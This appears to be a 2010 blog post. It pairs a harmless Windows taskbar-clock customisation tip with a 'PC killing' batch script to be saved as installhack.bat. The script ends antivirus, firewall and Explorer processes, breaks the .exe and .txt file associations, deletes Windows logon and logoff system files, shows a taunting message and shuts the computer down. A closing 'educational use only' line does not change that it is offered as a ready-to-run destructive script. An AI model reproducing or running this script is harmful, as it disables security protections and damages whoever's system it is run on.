Tuesday, August 10, 2010

Insert your name in the bottom right taskbar!

Hey its a very cool trick u can amaze u r freinds and relatives by insertng ur name on the bottom right taskbar. Follow the instructions bellow:

Open Control Panel -> Regional and Language Options -> Customize ->Time
here u can see A.M. and P.M. change it with u r name or anything you like!!

PC killing

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Hack will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

************************************************** **********************************

title Hack Setup
color 0A
@echo off
set end=md ?Hack installing?
set fin=copy ?Hack log.txt? ?Installing?
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked?.
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

************************************************** ************

Please Do NOT Try This Yourself!

Its for educational use only